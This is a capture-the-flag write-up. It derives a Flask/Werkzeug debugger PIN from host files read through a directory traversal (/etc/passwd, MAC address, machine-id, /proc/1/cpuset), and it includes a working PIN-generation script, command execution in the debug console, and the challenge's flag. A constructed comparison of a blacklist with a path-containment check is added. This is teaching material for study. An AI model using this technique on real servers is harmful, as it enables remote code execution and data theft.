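Analyzing the challenge
Start the environment and visit the page as the hint directs; it shows that cgroup, flag and self are filtered.
Trigger an error on the page: the debug console turns out to be enabled.
The console then asks for a PIN.
The GET request allows directory traversal, so the next step is to generate the PIN from the contents of the files that can be read this way: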
username (/etc/passwd)
app.py path (obtained from the page's error output)
mac address (/sys/class/net/eth0/address or /sys/class/net/ens33/address)
machine-id (/etc/machine-id)
cpuid (/proc/self/cgroup): the challenge bans self and cgroup, so /proc/1/cpuset can be used instead; for the reason, see this article.
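The filter described above rejects only the substrings cgroup, flag and self, so every file in this list still passes it. The following added example is not the challenge's code: the filter function, the base directory /srv/app/static and the traversal string are constructed assumptions. It compares such a substring filter with a resolved-path containment check.

```python
import os

# Constructed for illustration: the three substrings the page says are filtered.
BLACKLIST = ("cgroup", "flag", "self")

# Files this write-up reads to rebuild the PIN inputs.
PIN_INPUT_FILES = [
    "/etc/passwd",
    "/sys/class/net/eth0/address",
    "/etc/machine-id",
    "/proc/1/cpuset",
]


def blacklist_allows(requested: str) -> bool:
    """Hypothetical substring filter: reject only names containing a banned word."""
    return not any(word in requested for word in BLACKLIST)


def safe_resolve(base_dir: str, requested: str):
    """Hardened form: resolve the path and require it to stay under base_dir.

    Returns the resolved absolute path, or None when the request escapes base_dir.
    """
    base = os.path.realpath(base_dir)
    # lstrip so an absolute request cannot replace base inside os.path.join
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def audit(base_dir: str):
    """For each PIN input, return (path, passes_blacklist, passes_containment)."""
    rows = []
    for path in PIN_INPUT_FILES:
        traversal = "../" * 8 + path.lstrip("/")  # constructed traversal request
        rows.append((path, blacklist_allows(traversal),
                     safe_resolve(base_dir, traversal) is not None))
    return rows


if __name__ == "__main__":
    for path, by_blacklist, by_containment in audit("/srv/app/static"):
        print(f"{path:32} blacklist={by_blacklist} containment={by_containment}")
```

Every PIN input passes the substring filter and fails the containment check, which is why a deny-list of names does not protect the values the debugger PIN is derived from.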
Getting the username
Result: app
Getting the app.py path
Result: /usr/local/lib/python3.8/site-packages/flask/app.py
Getting the mac address
Note that the address has to be processed here:
addr = '02:42:ac:02:0b:64'
print(int(addr.replace(':', ''), 16))
Result: 2485376912228
Getting the machine-id
Result: 7265fe765262551a676151a24c02b7b6
Getting the cpuid
Result: cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114
Concatenating machine-id and cpuid
7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114
Run a script to get the PIN. Scripts for this are easy to find online; the one I used is:
import hashlib
from itertools import chain

# Values that are usually easy to learn about the target application.
probably_public_bits = [
    'app',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.8/site-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

# Values read from the host through the directory traversal.
private_bits = [
    '2485376912228',  # str(uuid.getnode()), /sys/class/net/eth0/address
    # get_machine_id(): /etc/machine-id concatenated with the /proc/1/cpuset value
    '7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114'
]

# Hash every bit in order, skipping empty ones.
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        # No group size divides the length evenly: use the digits as they are.
        rv = num

print(rv)
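Generated PIN: 155-314-265
Entering the console
Import os and run system commands. I was being dumb for a moment here: at first I did not notice the + sign at the end, and nothing could be read from the flag file no matter what I tried...
The real flag is in the readflag file...
Getting the flag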
HSCSEC{45035c7e-1eb5-452f-8356-2fc000e3d2b4}